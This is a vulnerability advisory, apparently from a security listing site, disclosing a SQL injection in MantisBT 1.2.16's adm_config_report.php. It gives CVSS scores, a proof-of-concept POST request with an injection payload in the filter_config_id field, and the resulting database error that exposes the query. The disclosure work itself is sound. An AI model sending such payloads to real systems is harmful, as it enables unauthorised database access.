MantisBT 1.2.16 SQL Injection

2014.03.03
Credit: HauntIT
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# ============================================================== # Title ...| MantisBT 1.2.16 # Version .| 1.2.16 # Date ....| 28.02.2014 # Found ...| HauntIT Blog # Home ....| http://www.mantisbt.org # ============================================================== [+] for authorized user # ============================================================== # SQL Injection ---<request>--- POST /k/cms/mantis/mantisbt-1.2.16/adm_config_report.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 135 save=1&filter_user_id=0&filter_project_id=0&filter_config_id='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&apply_filter_button=Apply+Filter ---<request>--- ---<response>--- <br /><div align="center"><table class="width50" cellspacing="1"><tr><td class="form-title">APPLICATION ERROR #401</td></tr><tr><td><p class="center" style="color:red">Database query failed. Error received from database was #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&gt;&lt;body/onload=alert(9999)&gt;' <br /> ORDER BY user_id, project_id, config_id' at line 3 for the query: SELECT config_id, user_id, project_id, type, value, access_reqd<br /> FROM mantis_config_table<br /> WHERE 1=1 AND user_id = 0 AND project_id = 0 AND config_id = ''&gt;&quot;&gt;&lt;body/onload=alert(9999)&gt;' <br /> ORDER BY user_id, project_id, config_id .</p></td></tr><tr><td><p class="center">Please use the "Back" button in your web browser to return to the previous page. There you can correct whatever problems were identified in this error or select another action. You can also click an option from the menu bar to go directly to a new section.</p></td></tr></table></div></body> </html> ---<response>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/

References:

http://www.mantisbt.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top